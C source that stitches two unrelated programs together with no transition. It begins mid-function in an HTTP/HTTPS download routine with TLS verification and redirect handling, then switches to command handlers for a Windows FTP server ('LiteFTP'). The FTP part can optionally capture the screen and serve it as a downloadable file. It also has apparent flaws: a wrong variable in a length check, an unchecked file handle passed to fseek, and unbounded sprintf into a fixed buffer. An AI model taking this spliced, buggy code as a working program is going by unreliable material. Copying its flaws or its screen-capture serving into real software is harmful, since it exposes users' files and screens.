if ((full_host = strdup(host)) == NULL)
errx(1, "Cannot allocate memory for hostname");
if (debug)
fprintf(ttyout, "host %s, port %s, path %s, "
"save as %s, auth %s.\n",
host, portnum, path, savefile, auth);
#endif /* !SMALL */
memset(&hints, 0, sizeof(hints));
hints.ai_family = family;
hints.ai_socktype = SOCK_STREAM;
#ifndef SMALL
port = portnum ? portnum : (ishttpsurl ? httpsport : httpport);
#else /* !SMALL */
port = portnum ? portnum : httpport;
#endif /* !SMALL */
error = getaddrinfo(host, port, &hints, &res0);
/*
* If the services file is corrupt/missing, fall back
* on our hard-coded defines.
*/
if (error == EAI_SERVICE && port == httpport) {
snprintf(pbuf, sizeof(pbuf), "%d", HTTP_PORT);
error = getaddrinfo(host, pbuf, &hints, &res0);
#ifndef SMALL
} else if (error == EAI_SERVICE && port == httpsport) {
snprintf(pbuf, sizeof(pbuf), "%d", HTTPS_PORT);
error = getaddrinfo(host, pbuf, &hints, &res0);
#endif /* !SMALL */
}
if (error) {
warnx("%s: %s", gai_strerror(error), host);
goto cleanup_url_get;
}
#ifndef SMALL
if (srcaddr) {
hints.ai_flags |= AI_NUMERICHOST;
error = getaddrinfo(srcaddr, NULL, &hints, &ares);
if (error) {
warnx("%s: %s", gai_strerror(error), srcaddr);
goto cleanup_url_get;
}
}
#endif /* !SMALL */
s = -1;
for (res = res0; res; res = res->ai_next) {
if (getnameinfo(res->ai_addr, res->ai_addrlen, hbuf,
sizeof(hbuf), NULL, 0, NI_NUMERICHOST) != 0)
strlcpy(hbuf, "(unknown)", sizeof(hbuf));
if (verbose)
fprintf(ttyout, "Trying %s...\n", hbuf);
s = socket(res->ai_family, res->ai_socktype, res->ai_protocol);
if (s == -1) {
cause = "socket";
continue;
}
#ifndef SMALL
if (srcaddr) {
if (ares->ai_family != res->ai_family) {
close(s);
s = -1;
errno = EINVAL;
cause = "bind";
continue;
}
if (bind(s, ares->ai_addr, ares->ai_addrlen) < 0) {
save_errno = errno;
close(s);
errno = save_errno;
s = -1;
cause = "bind";
continue;
}
}
#endif /* !SMALL */
again:
if (connect(s, res->ai_addr, res->ai_addrlen) < 0) {
if (errno == EINTR)
goto again;
save_errno = errno;
close(s);
errno = save_errno;
s = -1;
cause = "connect";
continue;
}
/* get port in numeric */
if (getnameinfo(res->ai_addr, res->ai_addrlen, NULL, 0,
pbuf, sizeof(pbuf), NI_NUMERICSERV) == 0)
port = pbuf;
else
port = NULL;
#ifndef SMALL
if (proxyenv && sslhost)
proxy_connect(s, sslhost, cookie);
#endif /* !SMALL */
break;
}
freeaddrinfo(res0);
#ifndef SMALL
if (srcaddr)
freeaddrinfo(ares);
#endif /* !SMALL */
if (s < 0) {
warn("%s", cause);
goto cleanup_url_get;
}
#ifndef SMALL
if (ishttpsurl) {
union { struct in_addr ip4; struct in6_addr ip6; } addrbuf;
if (proxyenv && sslpath) {
ishttpsurl = 0;
proxyurl = NULL;
path = sslpath;
}
SSL_library_init();
SSL_load_error_strings();
ssl_ctx = SSL_CTX_new(SSLv23_client_method());
if (ssl_ctx == NULL) {
ERR_print_errors_fp(ttyout);
goto cleanup_url_get;
}
if (ssl_verify) {
if (ssl_ca_file == NULL && ssl_ca_path == NULL)
ssl_ca_file = _PATH_SSL_CAFILE;
if (SSL_CTX_load_verify_locations(ssl_ctx,
ssl_ca_file, ssl_ca_path) != 1) {
ERR_print_errors_fp(ttyout);
goto cleanup_url_get;
}
SSL_CTX_set_verify(ssl_ctx, SSL_VERIFY_PEER, NULL);
if (ssl_verify_depth != -1)
SSL_CTX_set_verify_depth(ssl_ctx,
ssl_verify_depth);
}
if (ssl_ciphers != NULL &&
SSL_CTX_set_cipher_list(ssl_ctx, ssl_ciphers) == -1) {
ERR_print_errors_fp(ttyout);
goto cleanup_url_get;
}
ssl = SSL_new(ssl_ctx);
if (ssl == NULL) {
ERR_print_errors_fp(ttyout);
goto cleanup_url_get;
}
if (SSL_set_fd(ssl, s) == 0) {
ERR_print_errors_fp(ttyout);
goto cleanup_url_get;
}
/*
* RFC4366 (SNI): Literal IPv4 and IPv6 addresses are not
* permitted in "HostName".
*/
if (inet_pton(AF_INET, host, &addrbuf) != 1 &&
inet_pton(AF_INET6, host, &addrbuf) != 1) {
if (SSL_set_tlsext_host_name(ssl, host) == 0) {
ERR_print_errors_fp(ttyout);
goto cleanup_url_get;
}
}
if (SSL_connect(ssl) <= 0) {
ERR_print_errors_fp(ttyout);
goto cleanup_url_get;
}
if (ssl_verify) {
X509 *cert;
cert = SSL_get_peer_certificate(ssl);
if (cert == NULL) {
fprintf(ttyout, "%s: no server certificate\n",
getprogname());
goto cleanup_url_get;
}
if (ssl_check_hostname(cert, host) != 0) {
fprintf(ttyout, "%s: host `%s' not present in"
" server certificate\n",
getprogname(), host);
goto cleanup_url_get;
}
X509_free(cert);
}
} else {
fin = fdopen(s, "r+");
}
#else /* !SMALL */
fin = fdopen(s, "r+");
#endif /* !SMALL */
if (verbose)
fprintf(ttyout, "Requesting %s", origline);
/*
* Construct and send the request. Proxy requests don't want leading /.
*/
#ifndef SMALL
cookie_get(host, path, ishttpsurl, &buf);
#endif /* !SMALL */
epath = url_encode(path);
if (proxyurl) {
if (verbose)
fprintf(ttyout, " (via %s)\n", proxyurl);
/*
* Host: directive must use the destination host address for
* the original URI (path). We do not attach it at this moment.
*/
if (cookie)
ftp_printf(fin, ssl, "GET %s HTTP/1.0\r\n"
"Proxy-Authorization: Basic %s%s\r\n%s\r\n\r\n",
epath, cookie, buf ? buf : "", HTTP_USER_AGENT);
else
ftp_printf(fin, ssl, "GET %s HTTP/1.0\r\n%s%s\r\n\r\n",
epath, buf ? buf : "", HTTP_USER_AGENT);
} else {
#ifndef SMALL
if (resume) {
struct stat stbuf;
if (stat(savefile, &stbuf) == 0)
restart_point = stbuf.st_size;
else
restart_point = 0;
}
if (auth) {
ftp_printf(fin, ssl,
"GET /%s %s\r\nAuthorization: Basic %s\r\nHost: ",
epath, restart_point ?
"HTTP/1.1\r\nConnection: close" : "HTTP/1.0",
auth);
free(auth);
auth = NULL;
} else
#endif /* SMALL */
ftp_printf(fin, ssl, "GET /%s %s\r\nHost: ", epath,
#ifndef SMALL
restart_point ? "HTTP/1.1\r\nConnection: close" :
#endif /* !SMALL */
"HTTP/1.0");
if (strchr(host, ':')) {
/*
* strip off scoped address portion, since it's
* local to node
*/
h = strdup(host);
if (h == NULL)
errx(1, "Can't allocate memory.");
if ((p = strchr(h, '%')) != NULL)
*p = '\0';
ftp_printf(fin, ssl, "[%s]", h);
free(h);
} else
ftp_printf(fin, ssl, "%s", host);
/*
* Send port number only if it's specified and does not equal
* 80. Some broken HTTP servers get confused if you explicitly
* send them the port number.
*/
#ifndef SMALL
if (port && strcmp(port, (ishttpsurl ? "443" : "80")) != 0)
ftp_printf(fin, ssl, ":%s", port);
if (restart_point)
ftp_printf(fin, ssl, "\r\nRange: bytes=%lld-",
(long long)restart_point);
#else /* !SMALL */
if (port && strcmp(port, "80") != 0)
ftp_printf(fin, ssl, ":%s", port);
#endif /* !SMALL */
ftp_printf(fin, ssl, "\r\n%s%s\r\n\r\n",
buf ? buf : "", HTTP_USER_AGENT);
if (verbose)
fprintf(ttyout, "\n");
}
free(epath);
#ifndef SMALL
free(buf);
#endif /* !SMALL */
buf = NULL;
if (fin != NULL && fflush(fin) == EOF) {
warn("Writing HTTP request");
goto cleanup_url_get;
}
if ((buf = ftp_readline(fin, ssl, &len)) == NULL) {
warn("Receiving HTTP reply");
goto cleanup_url_get;
}
while (len > 0 && (buf[len-1] == '\r' || buf[len-1] == '\n'))
buf[--len] = '\0';
#ifndef SMALL
if (debug)
fprintf(ttyout, "received '%s'\n", buf);
#endif /* !SMALL */
cp = strchr(buf, ' ');
if (cp == NULL)
goto improper;
else
cp++;
strlcpy(ststr, cp, sizeof(ststr));
status = strtonum(ststr, 200, 416, &errstr);
if (errstr) {
warnx("Error retrieving file: %s", cp);
goto cleanup_url_get;
}
switch (status) {
case 200: /* OK */
#ifndef SMALL
/*
* When we request a partial file, and we receive an HTTP 200
* it is a good indication that the server doesn't support
* range requests, and is about to send us the entire file.
* If the restart_point == 0, then we are not actually
* requesting a partial file, and an HTTP 200 is appropriate.
*/
if (resume && restart_point != 0) {
warnx("Server does not support resume.");
restart_point = resume = 0;
}
/* FALLTHROUGH */
case 206: /* Partial Content */
#endif /* !SMALL */
break;
case 301: /* Moved Permanently */
case 302: /* Found */
case 303: /* See Other */
case 307: /* Temporary Redirect */
isredirect++;
if (redirect_loop++ > 10) {
warnx("Too many redirections requested");
goto cleanup_url_get;
}
break;
#ifndef SMALL
case 416: /* Requested Range Not Satisfiable */
warnx("File is already fully retrieved.");
goto cleanup_url_get;
#endif /* !SMALL */
default:
warnx("Error retrieving file: %s", cp);
goto cleanup_url_get;
}
/*
* Read the rest of the header.
*/
free(buf);
filesize = -1;
for (;;) {
if ((buf = ftp_readline(fin, ssl, &len)) == NULL) {
warn("Receiving HTTP reply");
goto cleanup_url_get;
}
while (len > 0 && (buf[len-1] == '\r' || buf[len-1] == '\n'))
buf[--len] = '\0';
if (len == 0)
break;
#ifndef SMALL
if (debug)
fprintf(ttyout, "received '%s'\n", buf);
#endif /* !SMALL */
/* Look for some headers */
cp = buf;
#define CONTENTLEN "Content-Length: "
if (strncasecmp(cp, CONTENTLEN, sizeof(CONTENTLEN) - 1) == 0) {
size_t s;
cp += sizeof(CONTENTLEN) - 1;
if ((s = strcspn(cp, " \t")))
*(cp+s) = 0;
filesize = strtonum(cp, 0, LLONG_MAX, &errstr);
if (errstr != NULL)
goto improper;
#ifndef SMALL
if (restart_point)
filesize += restart_point;
#endif /* !SMALL */
#define LOCATION "Location: "
} else if (isredirect &&
strncasecmp(cp, LOCATION, sizeof(LOCATION) - 1) == 0) {
cp += sizeof(LOCATION) - 1;
if (strstr(cp, "://") == NULL) {
#ifdef SMALL
errx(1, "Relative redirect not supported");
#else /* SMALL */
if (*cp == '/') {
locbase = NULL;
cp++;
} else {
locbase = strdup(path);
if (locbase == NULL)
errx(1, "Can't allocate memory"
" for location base");
loctail = strchr(locbase, '#');
if (loctail != NULL)
*loctail = '\0';
loctail = strchr(locbase, '?');
if (loctail != NULL)
*loctail = '\0';
loctail = strrchr(locbase, '/');
if (loctail == NULL) {
free(locbase);
locbase = NULL;
} else
loctail[1] = '\0';
}
/* Contruct URL from relative redirect */
if (asprintf(&redirurl, "%s%s%s%s/%s%s",
scheme, full_host,
portnum ? ":" : "",
portnum ? portnum : "",
locbase ? locbase : "",
cp) == -1)
errx(1, "Cannot build "
"redirect URL");
free(locbase);
#endif /* SMALL */
} else if ((redirurl = strdup(cp)) == NULL)
errx(1, "Cannot allocate memory for URL");
loctail = strchr(redirurl, '#');
if (loctail != NULL)
*loctail = '\0';
if (verbose)
fprintf(ttyout, "Redirected to %s\n", redirurl);
if (fin != NULL)
fclose(fin);
else if (s != -1)
close(s);
rval = url_get(redirurl, proxyenv, savefile);
free(redirurl);
goto cleanup_url_get;
}
free(buf);
}
/* Open the output file. */
if (!pipeout) {
#ifndef SMALL
if (resume)
out = open(savefile, O_CREAT | O_WRONLY | O_APPEND,
0666);
else
#endif /* !SMALL */
out = open(savefile, O_CREAT | O_WRONLY | O_TRUNC,
0666);
if (out < 0) {
warn("Can't open %s", savefile);
goto cleanup_url_get;
}
} else
out = fileno(stdout);
/* Trap signals */
oldintr = NULL;
oldinti = NULL;
if (setjmp(httpabort)) {
if (oldintr)
(void)signal(SIGINT, oldintr);
if (oldinti)
(void)signal(SIGINFO, oldinti);
goto cleanup_url_get;
}
oldintr = signal(SIGINT, aborthttp);
bytes = 0;
hashbytes = mark;
progressmeter(-1, path);
free(buf);
/* Finally, suck down the file. */
if ((buf = malloc(buflen)) == NULL)
errx(1, "Can't allocate memory for transfer buffer");
i = 0;
len = 1;
oldinti = signal(SIGINFO, psummary);
while (len > 0) {
len = ftp_read(fin, ssl, buf, buflen);
bytes += len;
for (cp = buf, wlen = len; wlen > 0; wlen -= i, cp += i) {
if ((i = write(out, cp, wlen)) == -1) {
warn("Writing %s", savefile);
signal(SIGINFO, oldinti);
goto cleanup_url_get;
}
else if (i == 0)
break;
}
if (hash && !progress) {
while (bytes >= hashbytes) {
(void)putc('#', ttyout);
hashbytes += mark;
}
(void)fflush(ttyout);
}
}
signal(SIGINFO, oldinti);
if (hash && !progress && bytes > 0) {
if (bytes < mark)
(void)putc('#', ttyout);
(void)putc('\n', ttyout);
(void)fflush(ttyout);
}
if (len != 0) {
warn("Reading from socket");
goto cleanup_url_get;
}
progressmeter(1, NULL);
if (
#ifndef SMALL
!resume &&
#endif /* !SMALL */
filesize != -1 && len == 0 && bytes != filesize) {
if (verbose)
fputs("Read short file.\n", ttyout);
goto cleanup_url_get;
}
if (verbose)
ptransfer(0);
(void)signal(SIGINT, oldintr);
rval = 0;
goto cleanup_url_get;
noftpautologin:
warnx(
"Auto-login using ftp URLs isn't supported when using $ftp_proxy");
goto cleanup_url_get;
improper:
warnx("Improper response from %s", host);
cleanup_url_get:
#ifndef SMALL
if (ssl) {
SSL_shutdown(ssl);
SSL_free(ssl);
}
free(full_host);
free(auth);
#endif /* !SMALL */
if (fin != NULL)
fclose(fin);
else if (s != -1)
close(s);
free(buf);
free(proxyurl);
free(newline);
free(cookie);
return (rval);
}
int do_STOR(ftp_session *s, char *param)
{
int len;
char arg[MAX_FTP_PATH], ftp_dir[MAX_FTP_PATH], buf[MAX_BUFFER];
FILE *fp;
SOCKET sockfd;
MATCH_SP(param);
len = get_string(param, arg, sizeof(arg));
if (len == 0)
return 501;
param += len;
MATCH_CRLF(param);
if (!parse_dir(s->dir, arg, ftp_dir))
return 553;
if (!ftp_to_fs_write(ftp_dir, arg))
return 553;
if (s->prev_command == cmd_REST)
{
fp = fopen(arg, is_file_exists(arg) ? "r+b" : "wb");
fseek(fp, s->restart, SEEK_SET);
}
else
fp = fopen(arg, "wb");
if (fp == NULL)
return 450;
ftp_printf(s->control, reply_150);
sockfd = ftp_connect(s);
if (sockfd == -1)
{
fclose(fp);
return 425;
}
for (;;)
{
s->tick = GetTickCount();
len = recv(sockfd, buf, sizeof(buf), 0);
if (len == 0)
break;
if (len == SOCKET_ERROR)
{
closesocket(sockfd);
fclose(fp);
return 426;
}
if (len != fwrite(buf, 1, len, fp))
{
closesocket(sockfd);
fclose(fp);
return 452;
}
}
closesocket(sockfd);
fclose(fp);
return 226;
}
int do_RETR(ftp_session *s, char *param)
{
int len;
char arg[MAX_FTP_PATH], ftp_dir[MAX_FTP_PATH], buf[MAX_BUFFER];
FILE *fp;
size_t read, write;
SOCKET sockfd;
#ifdef USE_SPECIAL_FILE
int type, start, size;
char *mem;
#endif
MATCH_SP(param);
len = get_string(param, arg, sizeof(arg));
if (len == 0)
return 501;
param += len;
MATCH_CRLF(param);
if (!parse_dir(s->dir, arg, ftp_dir))
return 550;
#ifndef USE_SPECIAL_FILE
if (!ftp_to_fs_read(ftp_dir, arg))
return 550;
#else
type = get_special_file(ftp_dir);
if (type == file_INVALID && !ftp_to_fs_read(ftp_dir, arg))
return 550;
if (type != file_INVALID)
{
start = 0;
switch (type)
{
#ifdef USE_SCREEN_BMP
case file_SCREEN_BMP:
mem = create_snapshot(&size);
if (mem == NULL)
return 450;
break;
#endif
#ifdef USE_SCREEN_JPG
case file_SCREEN_ZIP:
{
mem = create_jpeg(&size);
if (mem == NULL)
return 450;
break;
}
#endif
default:
return 450;
}
}
else
#endif
{
fp = fopen(arg, "rb");
if (fp == NULL)
return 450;
}
if (s->prev_command == cmd_REST)
{
#ifdef USE_SPECIAL_FILE
if (type != file_INVALID)
start = s->restart;
else
#endif
fseek(fp, s->restart, SEEK_SET);
}
ftp_printf(s->control, reply_150);
sockfd = ftp_connect(s);
if (sockfd == -1)
{
#ifdef USE_SPECIAL_FILE
if (type != file_INVALID)
free(mem);
else
#endif
fclose(fp);
return 425;
}
#ifdef USE_SPECIAL_FILE
if (type != file_INVALID)
{
write = my_send(sockfd, &mem[start], size-start, 0);
free(mem);
if (write != size-start)
{
closesocket(sockfd);
return 426;
}
}
else
#endif
{
while (!feof(fp))
{
s->tick = GetTickCount();
read = fread(buf, 1, sizeof(buf), fp);
if (ferror(fp))
{
closesocket(sockfd);
fclose(fp);
return 451;
}
write = my_send(sockfd, buf, read, 0);
if (read != write)
{
closesocket(sockfd);
fclose(fp);
return 426;
}
}
fclose(fp);
}
closesocket(sockfd);
return 226;
}
void WINAPI manage_ftp_session(ftp_session *s)
{
char buf[MAX_FTP_COMMAND];
int read, size, i, can_execute;
init_ftp_session(s);
ftp_printf(s->control, "220 LiteFTP Server ready.\r\n");
size = 0;
do
{
do
{
fd_set readfds;
TIMEVAL t;
FD_ZERO(&readfds);
FD_SET(s->control, &readfds);
t.tv_sec = 1;
t.tv_usec = 0;
read = select(0, &readfds, NULL, NULL, &t);
} while (!s->closed && read == 0);
if (read == 0)
break;
s->tick = GetTickCount();
read = recv(s->control, &buf[size], sizeof(buf)-size-1, 0);
if (read == 0 || read == SOCKET_ERROR)
break;
do
{
size += read;
can_execute = (size >= sizeof(buf)-1);
for (i = 0; i < size-1; i++)
if (buf[i] == '\r' && buf[i+1] == '\n')
{
can_execute = TRUE;
break;
}
if (can_execute)
{
buf[size] = 0;
parse_ftp_command(s, buf);
i += 2;
size -= i;
read = 0;
memmove(buf, &buf[i], size);
}
} while (can_execute);
} while (!s->closed);
closesocket(s->control);
if (s->passive)
closesocket(s->data);
#ifdef DEBUG
if (logging_enabled)
log("Control connection closed.\r\n");
#endif
session[s->sid].running = FALSE;
}
int do_LIST_NLST(ftp_session *s, char *param)
{
char *p, *dir, buf[MAX_BUFFER], ftp_dir[MAX_FTP_PATH];
int len, size;
SOCKET sockfd;
SYSTEMTIME stime;
dir = s->dir;
if (*param == ' ')
{
param++;
/* Fix: for something like LIST -la /etc (e.g: on Midnight Commander)
* Not compatible with standard
*/
if (*param == '-')
{
param++;
while (*param != ' ' && *param != 0)
param++;
if (*param == ' ')
param++;
}
len = get_string(param, buf, sizeof(buf));
if (param == 0)
return 501;
if (!parse_dir(dir, buf, ftp_dir))
return 450;
param += len;
dir = ftp_dir;
}
MATCH_CRLF(param);
ftp_printf(s->control, reply_150);
sockfd = ftp_connect(s);
if (sockfd == -1)
return 425;
size = 0;
GetLocalTime(&stime);
if (strcmp(dir, "/") == 0)
{
char drive[4];
char list_buf[128];
char *list_item[32];
int list_dir[32];
int list_count, i;
list_count = 0;
p = list_buf;
for (strcpy(drive, "a:\\"); drive[0] <= 'z'; drive[0]++)
{
int type = GetDriveType(drive);
if (type == DRIVE_FIXED ||
(list_cdrom && type == DRIVE_CDROM) ||
(list_floppy && type == DRIVE_REMOVABLE))
{
list_item[list_count] = p;
list_dir[list_count++] = TRUE;
*p++ = drive[0];
*p++ = 0;
}
}
#ifdef USE_SPECIAL_FILE
for (i = 0; special_file[i] != 0; i++)
{
list_item[list_count] = p;
list_dir[list_count++] = FALSE;
strcpy(p, special_file[i]);
p += strlen(p)+1;
}
#endif
for (i = 0; i < list_count; i++)
{
if (s->curr_command == cmd_LIST)
{
char ro = (readonly || !list_dir[i]) ? '-' : 'w';
char dir = list_dir[i] ? 'd' : '-';
char exec = list_dir[i] ? 'x' : '-';
size += sprintf(&buf[size],
"%cr%c%cr%c%cr%c%c 1 %-8s %-8s %10d %s %2d %02d:%02d %s\r\n",
dir, ro, exec, ro, exec, ro, exec, ftp_owner, ftp_group, 0,
month[stime.wMonth-1], stime.wDay, stime.wHour, stime.wMinute,
list_item[i]);
}
else
size += sprintf(&buf[size], "%s\r\n", list_item[i]);
if (size >= MAX_BUFFER_FILLED)
{
my_send(sockfd, buf, MAX_BUFFER_FILLED, 0);
size -= MAX_BUFFER_FILLED;
memmove(buf, &buf[MAX_BUFFER_FILLED], size);
}
}
}
else
{
WIN32_FIND_DATA find_data;
HANDLE handle;
ftp_to_fs(dir, buf);
strcpy(ftp_dir, buf);
if (is_dir_exists(ftp_dir))
{
len = strlen(ftp_dir);
if (ftp_dir[len-1] != '\\')
ftp_dir[len++] = '\\';
strcpy(&ftp_dir[len], "*.*");
}
handle = FindFirstFile(ftp_dir, &find_data);
if (handle != INVALID_HANDLE_VALUE)
{
do
{
char year[6], dir, ro, exec;
SYSTEMTIME time;
if (strcmp(find_data.cFileName, ".") == 0 ||
strcmp(find_data.cFileName, "..") == 0)
continue;
dir = (find_data.dwFileAttributes & FILE_ATTRIBUTE_DIRECTORY)
? 'd' : '-';
ro = (find_data.dwFileAttributes & FILE_ATTRIBUTE_READONLY)
|| readonly ? '-' : 'w';
exec = (find_data.dwFileAttributes & FILE_ATTRIBUTE_DIRECTORY)
? 'x' : '-';
FileTimeToSystemTime(&find_data.ftLastWriteTime, &time);
if (time.wYear == stime.wYear)
sprintf(year, "%02d:%02d", time.wHour, time.wMinute);
else
sprintf(year, "%d", time.wYear);
if (s->curr_command == cmd_LIST)
{
size += sprintf(&buf[size],
"%cr%c%cr%c%cr%c%c 1 %-8s %-8s %10lu %s %2d %5s %s\r\n",
dir, ro, exec, ro, exec, ro, exec, ftp_owner, ftp_group,
find_data.nFileSizeLow, month[time.wMonth-1],
time.wDay, year, find_data.cFileName);
}
else
size += sprintf(&buf[size], "%s\r\n", find_data.cFileName);
if (size >= MAX_BUFFER_FILLED)
{
my_send(sockfd, buf, MAX_BUFFER_FILLED, 0);
size -= MAX_BUFFER_FILLED;
memmove(buf, &buf[MAX_BUFFER_FILLED], size);
}
} while (FindNextFile(handle, &find_data));
FindClose(handle);
}
}
if (size >= 0)
my_send(sockfd, buf, size, 0);
closesocket(sockfd);
return 226;
}
int do_PWD(ftp_session *s, char *param)
{
MATCH_CRLF(param);
ftp_printf(s->control, "257 \"%s\" is current directory.\r\n", s->dir);
return 0;
}